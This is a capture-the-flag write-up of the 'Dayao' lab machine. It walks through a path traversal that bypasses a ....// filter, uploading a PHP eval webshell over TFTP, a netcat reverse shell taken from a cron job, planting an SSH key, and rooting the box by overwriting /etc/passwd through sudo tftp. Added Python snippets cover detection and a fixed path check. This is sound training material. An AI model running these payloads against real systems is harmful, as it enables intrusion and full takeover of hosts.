Dayao Target Machine Writeup

1. Information gathering

1.1 Port scan:
┌──(root㉿kali)-[~]
└─# nmap -sV -sS -A 192.168.209.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 04:49 EDT
Nmap scan report for 192.168.209.13
Host is up (0.00076s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: \xE2\x9C\xA7\xEF\xBD\xA5\xEF\xBE\x9F: *\xE2\x9C\xA7\xEF\xBD\xA5\xEF\xBE\x9F:* FILE TRANSFER *:\xEF\xBD\xA5\xEF\xBE\x9F\xE2\x9C\xA7*:\xEF\xBD\xA5\xEF\xBE\x9F\xE2\x9C\xA7
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:A2:4A:F2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.209.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds

Going straight to the web page: it invites us to upload a file, but no upload entry point can be found.

1.2 Directory scan:
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.209.13 -w /usr/share/wordlists/dirb/common.txt -t 50 -x .php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.209.13
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/file.php (Status: 200) [Size: 0]
/index.html (Status: 200) [Size: 2078]
/.htaccess.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/upload.php (Status: 200) [Size: 0]
/uploads (Status: 301) [Size: 318] [--> http://192.168.209.13/uploads/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

2. Getting a shell

The scan turned up file.php; it returns an empty page when opened, so fuzz its parameter name with wfuzz.

┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://192.168.209.13/file.php?FUZZ=....//....//....//....//....//....//etc/passwd --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.209.13/file.php?FUZZ=....//....//....//....//....//....//etc/passwd
Total requests: 4614

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001601: 200 27 L 40 W 1483 Ch "file"

The target's filter is bypassed with the doubled sequence (....//), and the parameter name turns out to be file. Read /etc/passwd:

┌──(root㉿kali)-[~]
└─# curl http://192.168.209.13/file.php?file=....//....//....//....//....//....//etc//passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tftp:x:106:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash
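From the defender's side, the requests above leave a clear trace in the web server's access log. The following is an added example (not part of the original writeup) that flags traversal attempts against file.php, including the doubled ....// form and percent-encoded variants; the log lines are constructed for the example and the IP, timestamps and user agents are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache combined log format. These are not records from the
# target; they model the kinds of requests the walkthrough sends to file.php.
SAMPLE_LOG = """\
192.168.209.222 - - [27/May/2025:07:38:10 -0400] "GET /file.php?file=....//....//....//etc/passwd HTTP/1.1" 200 1483 "-" "Wfuzz/3.1.0"
192.168.209.222 - - [27/May/2025:07:40:01 -0400] "GET /file.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1483 "-" "curl/8.5.0"
192.168.209.222 - - [27/May/2025:07:40:09 -0400] "GET /file.php?file=%252e%252e%252fetc/passwd HTTP/1.1" 200 1483 "-" "curl/8.5.0"
192.168.209.222 - - [27/May/2025:07:41:22 -0400] "GET /index.html HTTP/1.1" 200 2078 "-" "Mozilla/5.0"
192.168.209.222 - - [27/May/2025:07:42:05 -0400] "GET /file.php?file=uploads/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)')
# Two or more dots followed by a slash or backslash: matches ../ and also the
# ....// form that a single-pass str_replace('../', '') filter turns into ../.
DOT_SEGMENT_RE = re.compile(r"\.{2,}[\\/]")

def normalise(value: str) -> str:
    """Percent-decode until stable (catches %252e double encoding) and fold
    backslashes into slashes so ..\\ is treated like ../."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value.replace("\\", "/")

def traversal_params(target: str):
    """Return [(param, decoded_value)] for query parameters carrying a dot-dot segment."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = normalise(raw)
        if DOT_SEGMENT_RE.search(decoded):
            hits.append((name, decoded))
    return hits

def scan_log(text: str):
    """Return (line_no, status, size, hits) for each line with a suspicious query.
    A 200 with a non-zero size is the strongest signal: the read probably succeeded."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = traversal_params(m.group("target"))
        if hits:
            findings.append((line_no, int(m.group("status")), m.group("size"), hits))
    return findings
```

Running scan_log(SAMPLE_LOG) reports the first three lines and leaves the two legitimate requests alone.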

There is a tftp user, so a TFTP service is probably running; TFTP listens on UDP port 69.

┌──(root㉿kali)-[~]
└─# nmap -sU 192.168.209.13 -p 69
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 07:49 EDT
Nmap scan report for 192.168.209.13
Host is up (0.00082s latency).

PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 08:00:27:A2:4A:F2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds

In tftp the ls command has no effect, but get works, and the downloaded source confirms the double-write bypass. Next, try uploading a one-line webshell.

┌──(root㉿kali)-[~]
└─# tftp 192.168.209.13
tftp> ls
?Invalid command
tftp> get file.php
tftp>
tftp> ^[?Invalid command
tftp>
┌──(root㉿kali)-[~]
└─# cat file.php
<?php
// vuln.php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    // Filter ../ to prevent directory traversal (deliberately left flawed)
    $file = str_replace('../', '', $file);
    // Read the file with file_get_contents
    echo file_get_contents('/var/www/html/'.$file);
}
?>
```
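Why the filter fails, and what a sound check looks like. This is an added example, not the target's code: it re-implements the page's str_replace filter in Python (str.replace is single-pass in both languages), loops it to show that alone does not make it an allow-list, and then shows the containment check a fixed file.php should use; WEB_ROOT mirrors the prefix the page's code prepends, the function names are mine.

```python
import posixpath
from typing import Optional

WEB_ROOT = "/var/www/html"   # the prefix the page's file.php prepends

def filter_single_pass(user_path: str) -> str:
    """Mirror of the page's PHP filter: str_replace('../', '', $file).
    Both PHP's str_replace and Python's str.replace scan the input once, so
    deleting the inner '../' of '....//' leaves a brand-new '../' behind."""
    return user_path.replace("../", "")

def filter_until_stable(user_path: str) -> str:
    """Loop the replacement until nothing changes. This closes the doubled-sequence
    hole but is still a blacklist: absolute paths and other encodings pass untouched."""
    previous = None
    while previous != user_path:
        previous, user_path = user_path, user_path.replace("../", "")
    return user_path

def resolve_under_root(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Allow-list check: join, normalise lexically, and accept the result only if
    it is still inside root. Returns the path to open, or None to refuse.
    (A real deployment also runs the result through os.path.realpath so a
    symlink inside root cannot point outside it.)"""
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate
```

Note that without the flawed filter the literal ....// is harmless, it names a directory called "....", so the bypass exists only because the filter itself manufactures the ../ sequence.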

Upload:


┌──(root㉿kali)-[/tmp]
└─# cat aaa.php
<?php @eval($_POST['hack']);?>

┌──(root㉿kali)-[/tmp]
└─# tftp 192.168.209.13
tftp> put aaa.php
tftp>

Connect with AntSword.

Upload pspy64; it shows a cron job that spawns a reverse shell we can use directly.

2025/05/27 08:07:43 CMD: UID=0 PID=17769 | /bin/sh /sbin/dhclient-script
2025/05/27 08:07:43 CMD: UID=0 PID=17770 | /bin/sh /sbin/dhclient-script
2025/05/27 08:08:01 CMD: UID=0 PID=17771 | /usr/sbin/CRON -f
2025/05/27 08:08:01 CMD: UID=0 PID=17772 | /usr/sbin/CRON -f
2025/05/27 08:08:01 CMD: UID=1000 PID=17773 | /bin/sh -c nc -e /bin/bash 127.0.0.1 1234
^CExiting program... (interrupt)
www-data@Dayao:/tmp$ nc -lvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:60514.
uid=1000(wujing) gid=1000(wujing) groups=1000(wujing)

With a full shell as wujing, write in a public key:

wujing@Dayao:~$ mkdir .ssh
wujing@Dayao:~$ cd .ssh
wujing@Dayao:~/.ssh$ echo "ssh-rsa ......" > authorized_keys

Connect over SSH:

┌──(root㉿kali)-[~/.ssh]
└─# ssh wujing@192.168.209.13
Linux Dayao 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 27 04:18:47 2025 from 192.168.209.222
wujing@Dayao:~$ ls
user.txt
wujing@Dayao:~$ sudo -l
Matching Defaults entries for wujing on Dayao:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wujing may run the following commands on Dayao:
(ALL) NOPASSWD: /usr/bin/tftp
wujing@Dayao:~$

tftp can be run with sudo, so that is the way in.

3. Privilege escalation:

In /var/www/html, place a modified copy of /etc/passwd in which root's password is replaced with a known one (hash generated with openssl passwd).

The steps:

wujing@Dayao:/var/www/html$ cd /etc
wujing@Dayao:/etc$ sudo tftp 127.0.0.1 // run with sudo privileges
tftp> get passwd // arbitrary file write (same principle as fetching file.php earlier)
Received 1510 bytes in 0.0 seconds
tftp> wujing@Dayao:/etc$

wujing@Dayao:/etc$ cat passwd
root:$1$UIak.Duf$5aTSAlgZw/PPwcPxiwMdj1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tftp:x:106:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash
wujing@Dayao:/etc$ su - root
Password:
root@Dayao:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Dayao:~#
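The finished state above is exactly what a host audit should catch: a crypt hash sitting in the second field of /etc/passwd, where shadow passwords require an x. This is an added example, not the writeup's code; the passwd sample is constructed, copying only the root line the page shows.

```python
from typing import List, Tuple

# Constructed sample: the root line mirrors the state the walkthrough leaves behind
# (a crypt hash in the password field); the other entries are ordinary ones.
SAMPLE_PASSWD = """\
root:$1$UIak.Duf$5aTSAlgZw/PPwcPxiwMdj1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tftp:x:106:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
wujing:x:1000:1000:,,,:/home/wujing:/bin/bash
"""

# crypt(3) hash prefixes, so a finding can name the algorithm that was planted.
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}

def hash_algorithm(field: str) -> str:
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "unknown"

def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (account, reason) pairs for /etc/passwd entries worth investigating.
    With shadow passwords in use the second field must be 'x' (or '*' for a
    locked account); any other value is used for authentication directly, so a
    hash written there bypasses /etc/shadow and the policy attached to it."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {line_no}", "malformed entry, expected 7 fields"))
            continue
        name, password, uid, _gid, _gecos, _home, _shell = fields
        if password == "":
            findings.append((name, "empty password field allows login without a password"))
        elif password not in ("x", "*"):
            findings.append((name, f"{hash_algorithm(password)} hash stored in /etc/passwd, bypassing /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
    return findings
```

Pairing this with a file-integrity check on /etc/passwd, and removing NOPASSWD sudo rules for file-transfer tools such as tftp, closes the path the writeup uses.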

http://example.com/2025/05/27/Dayao靶机复盘/
Author: XCDH
Published: 27 May 2025